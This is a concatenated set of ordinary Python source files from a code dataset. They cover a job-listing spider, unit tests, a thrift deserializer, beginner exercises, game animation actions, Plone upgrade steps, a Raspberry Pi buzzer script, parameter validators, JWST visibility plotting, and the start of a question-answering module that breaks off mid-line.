overriding_map=MapJobTypes.map)\n )\n loader.add_value('apply_url', response.url)\n loader.add_xpath(\n 'duration',\n '//div[@id=\"rasp_job_details\"]/table/tbody/tr/td[contains(text(), \"Job Duration:\")]/following-sibling::td/text()'\n )\n loader.add_xpath(\n 'expiration_date',\n '//tr/td[contains(text(), \"Closing Date:\")]/following-sibling::td[1]/text()',\n ConvertDateString('%d-%b-%Y')\n )\n loader.add_xpath(\n 'baseSalary',\n '//div[@id=\"rasp_job_details\"]/table/tbody/tr/td[contains(text(), \"Salary Range:\")]/following-sibling::td/text()'\n )\n\n yield loader.load_item()\n","sub_path":"brightcorp/brightcorp/spiders/victoriagov.py","file_name":"victoriagov.py","file_ext":"py","file_size_in_byte":7352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"431619385","text":"# Copyright 2016 Mirantis, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom __future__ import absolute_import\nfrom __future__ import unicode_literals\n\nimport unittest\n\n# pylint: disable=import-error\nfrom mock import call\nfrom mock import Mock\nfrom mock import patch\n# pylint: enable=import-error\n\nfrom core.models.fuel_client import client\n\n# pylint: disable=no-self-use\n\n\n@patch('core.models.fuel_client.client.logger', autospec=True)\n@patch('core.models.fuel_client.base_client.Adapter', autospec=True)\nclass TestClient(unittest.TestCase):\n def test_init(self, adapter, logger):\n session = Mock(spec='keystoneauth1.session.Session')\n session.attach_mock(Mock(), 'auth')\n session.auth.auth_url = 'http://127.0.0.1'\n\n obj = client.Client(session=session)\n\n self.assertIn(\n call(service_type=u'ostf', session=session),\n adapter.mock_calls\n )\n\n logger.assert_has_calls((\n call.info(\n 'Initialization of NailgunClient using shared session \\n'\n '(auth_url={})'.format(session.auth.auth_url)),\n ))\n\n self.assertIn('ostf', dir(obj))\n","sub_path":"core/_tests/models/fuel_client/test_client.py","file_name":"test_client.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"90732133","text":"# -*- coding: utf-8 -*-\n\nimport os, sys, uuid\nimport thriftpy\nfrom thriftpy.protocol import TCyBinaryProtocolFactory\nfrom thriftpy.transport import TCyBufferedTransportFactory\nfrom ssf.settings import PROJECT_PATH\n\nthriftpy.install_import_hook()\nfrom esus.esus_thrift import *\n\ndiretorio = os.path.abspath(os.path.join(PROJECT_PATH, '..', 'esus/arquivos'))\ncaminhos = [os.path.join(diretorio, arquivo) for arquivo in os.listdir(diretorio)]\narquivos = [arq for arq in caminhos if os.path.isfile(arq)]\n\n# enviarUuidDadoSerializado = 'versao.Versao'+'uuid.uuid4()'\n\ntipos = {\n 2:CadastroIndividual(),\n 3:CadastroDomiciliar(),\n 4:AtendimentoIndividual(),\n 5:AtendimentoOdontologico(),\n 6:AtividadeColetiva(),\n 7:Procedimentos(),\n 8:VisitaDomiciliar(),\n 10:AtendimentoDomiciliar(),\n 11:AvaliacaoElegibilidade(),\n 12:ConsumoAlimentar(),\n}\n\ndef serializados(dado,ficha):\n d = thriftpy.transport.TMemoryBuffer(dado)\n d1 = thriftpy.protocol.TBinaryProtocol(d)\n d2 = ficha()\n d2.read(d1)\n return d2\n\nfor arquivo in arquivos:\n thrift = open(arquivo)\n transport = thriftpy.transport.TBufferedTransport(thrift)\n protocol = thriftpy.protocol.TBinaryProtocol(transport)\n trans = Transporte()\n trans.read(protocol)\n ficha = tipos.get(trans.tipoDadoSerializado)\n dado = trans.dadoSerializado\n serializados(dado,ficha)\n\n\n\n","sub_path":"esus/esus_client.py","file_name":"esus_client.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"130066112","text":"lista = list()\nwhile True:\n lista.append(int(input('Digite um número: ')))\n x = str(input('Deseja continuar? [S/N]')).strip().upper()[0]\n while not (x in 'SN'):\n x = str(input('Não entendi. Deseja continuar? [S?N]')).strip().upper()[0]\n if x in 'N':\n break\npares = list()\nimpares = list()\nfor pos, valor in enumerate(lista):\n if valor % 2 == 0:\n pares.append(lista[pos])\n else:\n impares.append(lista[pos])\nprint('-='*15)\nprint(f'Os valores digitados foram: {lista}')\nprint(f'Os valores pares digitados foram: {pares}')\nprint(f'Os valores ímpares digitados foram: {impares}')","sub_path":"Exercícios_1-106/Exercício_082.py","file_name":"Exercício_082.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"527594813","text":"#-*- coding: utf-8 -*-\n\nfrom cocos.actions import *\n\nclass ScaleXY(IntervalAction):\n\t\"\"\"Scales a `CocosNode` object by modify scalex, scaley\n\t\"\"\"\n\n\tdef init(self,scalex,scaley,duration):\n\t\tself.end_scalex=scalex\n\t\tself.end_scaley=scaley\n\t\tself.duration=duration\n\n\tdef start(self):\n\t\tself.start_scalex=self.target.scalex\n\t\tself.start_scaley=self.target.scaley\n\t\tself.deltax=self.end_scalex-self.start_scalex\n\t\tself.deltay=self.end_scaley-self.start_scaley\n\n\tdef update(self,t):\n\t\tself.target.scalex=self.start_scalex+self.deltax*t\n\t\tself.target.scaley=self.start_scaley+self.deltay*t\n\nclass RandPos(IntervalAction):\n\tm_Count=10\n\n\tdef init(self,duration):\n\t\tself.duration=duration\n\t\tself.idx=0\n\n\tdef start(self):\n\t\timport random\n\t\tx,y=self.target.position\n\t\tself.index=0\n\t\tself.randpos=[]\n\t\tfor _ in range(self.m_Count+1):\n\t\t\txrand=random.randint(-5,5)\n\t\t\tyrand=random.randint(-5,5)\n\t\t\tself.randpos.append((x+xrand,y+yrand))\n\t\tself.origin=x,y\n\n\tdef update(self,t):\n\t\tif t>=1.0:\n\t\t\tself.target.position=self.origin\n\t\t\treturn\n\t\tself.idx+=1\n\t\tif self.idx>self.m_Count:\n\t\t\tself.idx=0\n\t\tself.target.position=self.randpos[self.idx]\n\n","sub_path":"script/action.py","file_name":"action.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"496251209","text":"# -*- coding: utf-8 -*-\nfrom collective.cover.controlpanel import ICoverSettings\nfrom collective.cover.interfaces import ICover\nfrom collective.cover.logger import logger\nfrom collective.cover.tiles.configuration import ANNOTATIONS_KEY_PREFIX as PREFIX\nfrom collective.cover.upgrades import _get_tiles_inherit_from_list\nfrom copy import deepcopy\nfrom plone import api\nfrom plone.registry.interfaces import IRegistry\nfrom plone.tiles.interfaces import ITileDataManager\nfrom zope.component import getUtility\n\nimport json\n\n\ndef fix_persistentmap_to_dict(context):\n \"\"\"Internal structure was reverted from using PersistentMapping.\n Fix tiles here\"\"\"\n\n # Get covers\n covers = context.portal_catalog(portal_type='collective.cover.content')\n logger.info('About to update {0} objects'.format(len(covers)))\n tiles_to_update = _get_tiles_inherit_from_list(context)\n logger.info('{0} tile types will be updated ({1})'.format(\n len(tiles_to_update), ', '.join(tiles_to_update)))\n for cover in covers:\n obj = cover.getObject()\n tile_ids = obj.list_tiles(types=tiles_to_update)\n for tile_id in tile_ids:\n tile = obj.get_tile(tile_id)\n old_data = ITileDataManager(tile).get()\n uuids = old_data['uuids']\n if isinstance(uuids, dict):\n # This tile is fixed, carry on\n msg = 'Tile {0} at {1} was already updated'\n logger.info(msg.format(tile_id, cover.getPath()))\n continue\n if not uuids:\n # This tile did not have data, so ignore\n msg = 'Tile {0} at {1} did not have any data'\n logger.info(msg.format(tile_id, cover.getPath()))\n continue\n\n new_data = dict()\n for k, v in uuids.items():\n new_data[k] = v\n\n old_data['uuids'] = new_data\n ITileDataManager(tile).set(old_data)\n\n msg = 'Tile {0} at {1} updated'\n logger.info(msg.format(tile_id, cover.getPath()))\n\n logger.info('Done')\n\n\ndef _remove_css_class_layout(layout, is_child=False):\n \"\"\"Recursivelly remove class attribute from layout.\"\"\"\n if not is_child:\n layout = json.loads(layout)\n fixed_layout = []\n for row in layout:\n fixed_row = {\n k: v\n for k, v in row.iteritems()\n if k != u'class'\n }\n if u'children' in fixed_row:\n fixed_row[u'children'] = _remove_css_class_layout(fixed_row[u'children'], True)\n fixed_layout.append(fixed_row)\n if is_child:\n return fixed_layout\n else:\n fixed_layout = json.dumps(fixed_layout)\n return fixed_layout.decode('utf-8')\n\n\ndef remove_css_class_layout(context):\n \"\"\"Remove CSS class from registry and cover layouts.\"\"\"\n logger.info('CSS classes will be removed from Cover layouts.')\n # Fix registry layouts\n registry = getUtility(IRegistry)\n settings = registry.forInterface(ICoverSettings)\n fixed_layouts = {}\n for name, layout in settings.layouts.iteritems():\n fixed_layouts[name] = _remove_css_class_layout(layout)\n settings.layouts = fixed_layouts\n logger.info('Registry layouts were updated.')\n\n # Fix cover layouts\n covers = context.portal_catalog(object_provides=ICover.__identifier__)\n logger.info('Layout of {0} objects will be updated'.format(len(covers)))\n\n for cover in covers:\n obj = cover.getObject()\n obj.cover_layout = _remove_css_class_layout(obj.cover_layout)\n logger.info('\"{0}\" was updated'.format(obj.absolute_url_path()))\n\n\ndef remove_orphan_annotations(context):\n \"\"\"Remove annotations left behind after tile removal.\n\n The bug was fixed in bf386fee but no upgrade step was provided to\n clean up the objects.\n \"\"\"\n catalog = api.portal.get_tool('portal_catalog')\n results = catalog(object_provides=ICover.__identifier__)\n logger.info('Checking {0} objects for orphan annotations'.format(len(results)))\n\n for brain in results:\n cover = brain.getObject()\n tiles = cover.list_tiles()\n\n try:\n orphan_annotations = [\n k for k in cover.__annotations__.keys()\n if k.startswith(PREFIX) and k.split('.')[3] not in tiles\n ]\n\n for k in orphan_annotations:\n del(cover.__annotations__[k])\n\n if orphan_annotations:\n msg = 'Removed {0} annotations from \"{1}\"'\n logger.info(\n msg.format(len(orphan_annotations), cover.absolute_url_path()))\n\n except AttributeError:\n pass # cover with no annotations\n\n\ndef _simplify_layout(layout, is_child=False):\n \"\"\"Recursivelly move column-size to parent and remove data attribute from layout.\"\"\"\n if not is_child:\n layout = json.loads(layout)\n fixed_layout = []\n for row in layout:\n fixed_row = deepcopy(row)\n if u'data' in row:\n if u'column-size' in row[u'data']:\n fixed_row[u'column-size'] = fixed_row[u'data'][u'column-size']\n del(fixed_row[u'data'])\n if u'children' in fixed_row:\n fixed_row[u'children'] = _simplify_layout(fixed_row[u'children'], True)\n fixed_layout.append(fixed_row)\n if is_child:\n return fixed_layout\n else:\n fixed_layout = json.dumps(fixed_layout)\n return fixed_layout.decode('utf-8')\n\n\ndef simplify_layout(context):\n \"\"\"Move column-size to parent and remove data attribute from layout.\"\"\"\n logger.info('Cover layouts will be simplified.')\n # Fix registry layouts\n registry = getUtility(IRegistry)\n settings = registry.forInterface(ICoverSettings)\n fixed_layouts = {}\n for name, layout in settings.layouts.iteritems():\n fixed_layouts[name] = _simplify_layout(layout)\n settings.layouts = fixed_layouts\n logger.info('Registry layouts were updated.')\n\n # Fix cover layouts\n covers = context.portal_catalog(object_provides=ICover.__identifier__)\n logger.info('Layout of {0} objects will be updated'.format(len(covers)))\n\n for cover in covers:\n obj = cover.getObject()\n obj.cover_layout = _simplify_layout(obj.cover_layout)\n logger.info('\"{0}\" was updated'.format(obj.absolute_url_path()))\n","sub_path":"buildout-cache/eggs/collective.cover-1.2b1-py2.7.egg/collective/cover/upgrades/v11/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"558437709","text":"#Author: Robert Schreibman\r\n#Date: 2-8-18\r\n#Description:\r\n#Think Exercise Answers: a1, a2, a3, and c1\r\n\r\n#Questions\r\n#a1) At what clock value is data transmitted? (0-falling or 1-rising?)\r\n # 0-falling edge of clock\r\n#a2) At what clock value is data received? (0-falling or 1-rising?)\r\n # 1-rising edge of clock\r\n#a3) How many bytes are transmitted/received? (recall 1 byte = 8 bits)\r\n # 2 bytes are transmitted (only uses 10 bits though)\r\n#c1) Max Value for 10 bits is 2^10 - 1 = 1023\r\n\r\n#import libraries:\r\nimport numpy as np #numpy for arrays\r\nimport time\t\t #time to use the sleep command\r\nimport spidev #spidev as spi for working with the ADC\r\nimport RPi.GPIO as GPIO\t\t#controls General Purpose I/O pins\r\n\r\nbuzzerPin = 19 #(output signal)\r\nGPIO.setmode(GPIO.BCM)\r\nGPIO.setup(buzzerPin,GPIO.OUT)\r\n\r\nspi = spidev.SpiDev() #create spidev object\r\nspi.open(0,0) #(port, channel)\r\nspi.max_speed_hz = 1000000 #optional, use so you dont overwork RPi\r\n\r\n#Buzz function is provided (uses half period method)\r\n#This code is derived from basics physics of how sound works but to save time\r\n#we googled those calculations.\r\ndef buzz(pitch, duration):\r\n period = 1.0 / pitch\r\n delay = period / 2\r\n cycles = int(duration * pitch)\r\n for i in range(cycles):\r\n GPIO.output(buzzerPin, True)\r\n time.sleep(delay)\r\n GPIO.output(buzzerPin, False)\r\n time.sleep(delay)\r\n time.sleep(duration * 0.3)\r\n\r\ndef readAdc(channel):\r\n #You may use the incoming parameter to make more flexible later\r\n #Read the raw data for channel 0 using the xfer2 method, which\r\n #sends AND receives depending on the clock rise/fall.\r\n r = spi.xfer2([int('01100000',2), 15])\r\n\r\n #Get data\r\n #get 10 bit bitstring from r[0]\r\n s = bin(r[0])[2:].zfill(10)\r\n #append 8 '0's to last 2 bits from r[0]\r\n data = int(s[8:] + '0'*8, 2) + r[1]\r\n return data\r\n\r\ndata = np.loadtxt(\"song.txt\")\r\nprint(data)\r\npitches = np.int_(data[:,0])\r\nprint(pitches)\r\n\r\nwhile True:\r\n x = readAdc(0)\r\n print(x)\r\n for val1, val2 in zip(pitches,data[:,1]):\r\n buzz(val1, val2)\r\n\r\n buzz(500,.2)\r\n\r\n\r\n\r\n","sub_path":"lab3/sound.py","file_name":"sound.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"87831329","text":"import datetime\n\nimport numpy as np\nfrom marshmallow import (\n validate as marshmallow_validate,\n ValidationError,\n fields as marshmallow_fields,\n)\n\nfrom paramtools import utils\n\n\nclass Range(marshmallow_validate.Range):\n \"\"\"\n Implements \"range\" :ref:`spec:Validator object`.\n \"\"\"\n\n error = \"\"\n\n def __init__(\n self, min=None, max=None, error_min=None, error_max=None, step=None\n ):\n self.min = min\n self.max = max\n self.error_min = error_min\n self.error_max = error_max\n self.step = step or 1 # default to 1\n\n def _format_error(self, value, message):\n return message.format(input=value, min=self.min, max=self.max)\n\n def __call__(self, value):\n if value is None:\n return value\n if not isinstance(value, list):\n value_list = [value]\n else:\n value_list = utils.ravel(value)\n\n for val in value_list:\n if self.min is not None and val < self.min:\n message = self.error_min or self.message_min\n raise ValidationError(self._format_error(value, message))\n\n if self.max is not None and val > self.max:\n message = self.error_max or self.message_max\n raise ValidationError(self._format_error(value, message))\n\n return value\n\n def grid(self):\n # make np.arange inclusive.\n max_ = self.max + self.step\n arr = np.arange(self.min, max_, self.step)\n return arr[arr <= self.max].tolist()\n\n\nclass DateRange(Range):\n \"\"\"\n Implements \"date_range\" :ref:`spec:Validator object`.\n Behaves like ``Range``, except values are ensured to be\n ``datetime.date`` type and ``grid`` has special logic for dates.\n \"\"\"\n\n def __init__(\n self, min=None, max=None, error_min=None, error_max=None, step=None\n ):\n if min is not None and not isinstance(min, datetime.date):\n min = marshmallow_fields.Date()._deserialize(min, None, None)\n if max is not None and not isinstance(max, datetime.date):\n max = marshmallow_fields.Date()._deserialize(max, None, None)\n\n super().__init__(min, max, error_min, error_max)\n\n if step is None:\n # set to to default step.\n step = {\"days\": 1}\n # check against allowed args:\n # https://docs.python.org/3/library/datetime.html#datetime.timedelta\n timedelta_args = {\n \"days\",\n \"seconds\",\n \"microseconds\",\n \"milliseconds\",\n \"minutes\",\n \"hours\",\n \"weeks\",\n }\n assert len(set(step.keys()) - timedelta_args) == 0\n self.step = datetime.timedelta(**step)\n\n def grid(self):\n # make np.arange inclusive.\n max_ = self.max + self.step\n arr = np.arange(self.min, max_, self.step, dtype=datetime.date)\n return arr[arr <= self.max].tolist()\n\n\nclass OneOf(marshmallow_validate.OneOf):\n \"\"\"\n Implements \"choice\" :ref:`spec:Validator object`.\n \"\"\"\n\n def __call__(self, value):\n if value is None:\n return value\n if not isinstance(value, list):\n values = [value]\n else:\n values = utils.ravel(value)\n for val in values:\n try:\n if val not in self.choices:\n raise ValidationError(self._format_error(val))\n except TypeError:\n raise ValidationError(self._format_error(val))\n return value\n\n def grid(self):\n return self.choices\n","sub_path":"paramtools/contrib/validate.py","file_name":"validate.py","file_ext":"py","file_size_in_byte":3571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"289892080","text":"first_name = input('Введите Ваше имя: ')\nlast_name = input('Введите Вашу фамилию: ')\nage = int(input('Введите Ваш возраст: '))\nweight = int(input('Введите Ваш вес: '))\n\nrecommendation = ''\nif age <= 30 and 120 >= weight > 50: # age ∈ [0:30] weight ∈ (50:120]\n recommendation = \"хорошее состояние\"\nelif age > 30 and 120 >= weight > 50: # age ∈ (30:+infinity] weight ∈ (50:120]\n recommendation = \"нормальное состояние\"\nelif age > 40 and not 120 >= weight > 50: # age ∈ (40:+infinity] weight ∈ [0:50] & (120:+infinity]\n recommendation = \"следует обратится к врачу!\"\nelif age > 30 and not 120 >= weight > 50: # age ∈ (30:+infinity] weight ∈ [0:50] & (120:+infinity]\n recommendation = \"следует заняться собой\"\nelse:\n recommendation = \"жить будите\"\n\nprint(\"%s %s, %d год, вес %d - %s\" % (first_name, last_name, age, weight, recommendation))\n","sub_path":"l1_task_3.py","file_name":"l1_task_3.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"218849328","text":"#Produces a graph of the visibility & accessible position angles\r\n#for a given RA & DEC, and prints out corresponding information,\r\n#including the ranges of accessible and inaccessible PAs.\r\n#\r\n#Usage: python visibilityPA.py RA DEC [targetName]\r\n# if targetName is specified, then the figure is saved\r\n#\r\n#-Created by David Lafreniere, March 2016\r\n#-makes use of (and hacks) several scripts created by Pierre Ferruit\r\n# that are part of the JWST Python tools JWSTpylib and JWSTpytools\r\n\r\n\r\nimport sys\r\nfrom . import ephemeris_old2x as EPH\r\nimport math\r\nimport numpy as np\r\nimport matplotlib\r\nmatplotlib.use('Agg')\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.dates as mdates\r\nfrom matplotlib.ticker import AutoMinorLocator\r\nfrom matplotlib.ticker import MultipleLocator\r\nfrom astropy.io import ascii\r\nimport os\r\nimport pkg_resources\r\nimport datetime\r\n\r\nD2R = math.pi/180. #degrees to radians\r\nR2D = 180./math.pi #radians to degrees \r\n\r\ndef convert_ddmmss_to_float(astring):\r\n aline = astring.split(':')\r\n d = float(aline[0])\r\n m = float(aline[1])\r\n s = float(aline[2])\r\n hour_or_deg = (s/60.+m)/60.+d\r\n return hour_or_deg\r\n\r\ndef checkVisPA(ra, dec, targetName=None, ephFileName=pkg_resources.resource_filename('ExoCTK', 'data/contam_visibility/JWST_ephem_short.txt'), save=False, fig=''):\r\n \r\n if ra.find(':')>-1: #format is hh:mm:ss.s or dd:mm:ss.s \r\n ra = convert_ddmmss_to_float(ra) * 15. * D2R\r\n dec = convert_ddmmss_to_float(dec) * D2R\r\n else: #format is decimal\r\n ra = float(ra) * D2R\r\n dec = float(dec) * D2R\r\n\r\n #load ephemeris\r\n eclFlag = False\r\n eph = EPH.Ephemeris(ephFileName, eclFlag)\r\n \r\n #convert dates from MJD to Gregorian calendar dates\r\n mjd = np.array(eph.datelist)\r\n d = mdates.julian2num(mjd+2400000.5)\r\n gd = mdates.num2date(d)\r\n\r\n #loop through dates and determine VIS and PAs (nominal, min, max)\r\n vis = np.empty(mjd.size,dtype=bool)\r\n paNom, paMin, paMax = np.empty(mjd.size), np.empty(mjd.size), np.empty(mjd.size)\r\n for i in range(mjd.size):\r\n \r\n #is it visible?\r\n vis[i] = eph.in_FOR(mjd[i],ra,dec)\r\n \r\n #nominal PA at this date\r\n pa = eph.normal_pa(mjd[i],ra,dec)\r\n\r\n #search for minimum PA allowed by roll\r\n pa0 = pa\r\n while eph.is_valid(mjd[i],ra,dec,pa0-0.002):\r\n pa0 -= 0.002\r\n \r\n #search for maximum PA allowed by roll\r\n pa1 = pa\r\n while eph.is_valid(mjd[i],ra,dec,pa1+0.002):\r\n pa1 += 0.002\r\n\r\n paNom[i] = (pa*R2D)%360\r\n paMin[i] = (pa0*R2D)%360\r\n paMax[i] = (pa1*R2D)%360\r\n\r\n #does PA go through 360 deg?\r\n wrap = np.any(np.abs(np.diff(paNom[np.where(vis)[0]])) > 350)\r\n\r\n #Determine good and bad PA ranges\r\n #Good PAs\r\n i, = np.where(vis)\r\n pa = np.concatenate((paNom[i],paMin[i],paMax[i]))\r\n \r\n if wrap: \r\n pa = np.append(pa,(0.,360.))\r\n pa.sort()\r\n \r\n i1, = np.where(np.diff(pa)>10)\r\n i0 = np.insert(i1+1,0,0)\r\n i1 = np.append(i1,-1)\r\n paGood = np.dstack((pa[i0],pa[i1])).round(1).reshape(-1,2).tolist()\r\n\r\n #bad PAs (complement of the good PAs)\r\n paBad = []\r\n if paGood[0][0]>0:\r\n paBad.append([0.,paGood[0][0]])\r\n for i in range(1,len(paGood)):\r\n paBad.append([paGood[i-1][1],paGood[i][0]])\r\n if paGood[-1][1]<360.:\r\n paBad.append([paGood[-1][1],360.])\r\n\r\n #print results to file\r\n \"\"\"\r\n if save:\r\n fName='visibilityPA-'+targetName+'.txt'\r\n fic=open(fName,'w')\r\n\r\n fic.write('#Date MJD VIS? PAnom PArange\\n')\r\n for i in range(vis.size):\r\n tmp1='{:7.3f}'.format(paNom[i]) if vis[i] else 7*'-'\r\n tmp2='{:7.3f}--{:7.3f}'.format(paMin[i],paMax[i]) if vis[i] else 16*'-'\r\n #fic.write(gd[i].strftime(\"%y-%m-%d\")+' {:f} {:5s} {:7.3f} {:7.3f}--{:7.3f} \\n'.format(mjd[i],str(vis[i]),paNom[i],paMin[i],paMax[i]))\r\n fic.write(gd[i].strftime(\"%y-%m-%d\")+' {:f} {:5s} {} {} \\n'.format(mjd[i],str(vis[i]),tmp1,tmp2))\r\n\r\n fic.write(\"\\n\")\r\n fic.write(\"Accessible PA ranges: \")\r\n fic.write(','.join([str(x) for x in paGood]))\r\n fic.write(\"\\n\")\r\n fic.write(\"Non-accessible PA ranges: \")\r\n fic.write(','.join([str(x) for x in paBad]))\r\n fic.write(\"\\n\")\r\n fic.close()\r\n \"\"\"\r\n # Make a figure\r\n if not fig or fig==True:\r\n fig = plt.gcf()\r\n \r\n # Do all figure calculations\r\n iBad, = np.where(vis==False)\r\n paMasked = np.copy(paNom)\r\n paMasked[iBad] = np.nan\r\n gdMasked = np.copy(gd)\r\n\r\n i = np.argmax(paNom)\r\n if paNom[i+1]<10: \r\n i+=1\r\n paMasked = np.insert(paMasked,i,np.nan)\r\n gdMasked = np.insert(gdMasked,i,gdMasked[i])\r\n\r\n i = np.argmax(paMin)\r\n goUp = paMin[i-2]<paMin[i-1] #PA going up at wrap point?\r\n\r\n # Top part\r\n i0_top = 0 if goUp else i\r\n i1_top = i if goUp else paMin.size-1\r\n paMaxTmp = np.copy(paMax)\r\n paMaxTmp[np.where(paMin>paMax)[0]] = 360\r\n \r\n # Bottom part\r\n i = np.argmin(paMax)\r\n i0_bot = i if goUp else 0\r\n i1_bot = paMin.size-1 if goUp else i \r\n paMinTmp = np.copy(paMin)\r\n paMinTmp[np.where(paMin>paMax)[0]] = 0\r\n\r\n # Add fits to matplotlib\r\n if isinstance(fig, matplotlib.figure.Figure):\r\n\r\n # Make axes\r\n ax = plt.axes()\r\n plt.title(targetName)\r\n \r\n #plot nominal PA\r\n plt.plot(gdMasked,paMasked,color='k')\r\n \r\n #plot ranges allowed through roll\r\n if wrap:\r\n i = np.argmax(paMin)\r\n goUp = paMin[i-2]<paMin[i-1] #PA going up at wrap point?\r\n \r\n #top part\r\n plt.fill_between(gd[i0_top:i1_top+1],paMin[i0_top:i1_top+1],paMaxTmp[i0_top:i1_top+1],where=vis[i0_top:i1_top+1],lw=0,facecolor='k',alpha=0.5)\r\n \r\n #bottom part\r\n plt.fill_between(gd[i0_bot:i1_bot+1],paMinTmp[i0_bot:i1_bot+1],paMax[i0_bot:i1_bot+1],where=vis[i0_bot:i1_bot+1],lw=0,facecolor='k',alpha=0.5)\r\n \r\n else:\r\n plt.fill_between(gd,paMin,paMax,where=vis,lw=0,facecolor='k',alpha=0.5)\r\n\r\n plt.ylabel('Position Angle (degrees)')\r\n plt.xlim(min(gd),max(gd))\r\n ax.xaxis.set_major_locator(mdates.MonthLocator())\r\n ax.xaxis.set_major_formatter(mdates.DateFormatter(\"%b '%y\"))\r\n ax.xaxis.set_minor_locator(mdates.DayLocator(list(range(1,32,5))))\r\n plt.ylim(0,360)\r\n ax.yaxis.set_major_locator(MultipleLocator(25))\r\n ax.yaxis.set_minor_locator(MultipleLocator(5))\r\n plt.grid()\r\n for label in ax.get_xticklabels():\r\n label.set_rotation(45)\r\n \r\n # Or to bokeh!\r\n else:\r\n \r\n # Convert datetime to a number for Bokeh\r\n gdMaskednum = [datetime.date(2019, 6, 1)+datetime.timedelta(days=n) for n,d in enumerate(gdMasked)]\r\n color = 'green'\r\n\r\n # Draw the curve and error\r\n fig.line(gdMaskednum, paMasked, legend='cutoff', line_color=color)\r\n \r\n # Top\r\n err_y = np.concatenate([paMin[i0_top:i1_top+1],paMaxTmp[i0_top:i1_top+1][::-1]])\r\n # err_x = np.concatenate([[d.timestamp() for d in gd[i0_top:i1_top+1]],[d.timestamp() for d in gd[i0_top:i1_top+1]][::-1]])\r\n err_x = np.concatenate([gdMaskednum[i0_top:i1_top+1],gdMaskednum[i0_top:i1_top+1][::-1]])\r\n fig.patch(err_x, err_y, color=color, fill_alpha=0.2, line_alpha=0)\r\n\r\n # Bottom\r\n err_y = np.concatenate([paMinTmp[i0_bot:i1_bot+1],paMax[i0_bot:i1_bot+1][::-1]])\r\n # err_x = np.concatenate([[d.timestamp() for d in gd[i0_bot:i1_bot+1]],[d.timestamp() for d in gd[i0_bot:i1_bot+1]][::-1]])\r\n err_x = np.concatenate([gdMaskednum[i0_bot:i1_bot+1],gdMaskednum[i0_bot:i1_bot+1][::-1]])\r\n fig.patch(err_x, err_y, color=color, fill_alpha=0.2, line_alpha=0)\r\n \r\n # Plot formatting\r\n fig.xaxis.axis_label = 'Date'\r\n fig.yaxis.axis_label = 'Position Angle (degrees)'\r\n \r\n return paGood, paBad, gd, fig\r\n\r\n","sub_path":"ExoCTK/contam_visibility/visibilityPA.py","file_name":"visibilityPA.py","file_ext":"py","file_size_in_byte":8061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"640814718","text":"n = int(input(\"n: \")) \nm = int(input(\"m: \"))\nih = 0\nfor i in range(n,m+1):\n count = 0\n for j in range(2,i//2+1):\n if i%j==0:\n count=count+1\n if count==0:\n if i > ih:\n ih = i\nprint(ih)\n","sub_path":"хичээл00/9_2_12.py","file_name":"9_2_12.py","file_ext":"py","file_size_in_byte":229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"293810400","text":"# Copyright (c) 2021 OpenKS Authors, DCD Research Lab, Zhejiang University. \n# All Rights Reserved.\n\n\"\"\"\nAnswer fetch progam to receive structured question and get possible answers\n\"\"\"\nimport logging\nfrom sklearn.metrics.pairwise import euclidean_distances\nfrom typing import TypeVar\nfrom .question_parser import StrucQ\nfrom ...abstract.mtg import MTG\n\nlogger = logging.getLogger(__name__)\nT = TypeVar('T')\n\nclass AnswerFetcher(object):\n\n\tdef __init__(self, struc_q: StrucQ) -> None:\n\t\tself.struc_q = struc_q\n\n\tdef struc_q_rule_check(self) -> bool:\n\t\tif len(self.struc_q.relations) == 0:\n\t\t\tlogger.warn(\"No relation found from the question.\")\n\t\t\treturn False\n\t\telif len(self.struc_q.entities) == 0:\n\t\t\tlogger.warn(\"No entity found from the question.\")\n\t\t\treturn False\n\t\telse:\n\t\t\treturn True\n\n\tdef struc_q_embed_check(self) -> bool:\n\t\tif self.struc_q.q_entity_embed.size == 0 and self.struc_q.q_relation_embed.size == 0 and self.struc_q.q_embed.size == 0:\n\t\t\tlogger.warn(\"No embedding computed from the question.\")\n\t\t\treturn False\n\t\telse:\n\t\t\treturn True\n\n\tdef fetch_by_matching(self, graph: MTG) -> T:\n\t\t\"\"\" fetch the answer through matching MTG knowledge graph dataset \"\"\"\n\t\tif not self.struc_q_rule_check():\n\t\t\treturn None\n\n\t\tentity_info = self.struc_q.entities[0]\n\t\trelation_type = self.struc_q.relations[0]\n\t\ttarget_type = self.struc_q.target_type['type']\n\t\tquestion_type = self.struc_q.question_class['type']\n\n\t\tentity_id = entity_info['id']\n\t\tentity_type = entity_info['type']\n\t\tsource_rel_col_index = 0\n\t\ttarget_rel_col_index = 0\n\t\tfor item in graph.schema:\n\t\t\tif item['type'] == 'relation' and item['concept'] == relation_type:\n\t\t\t\tif item['members'].index(entity_type) == 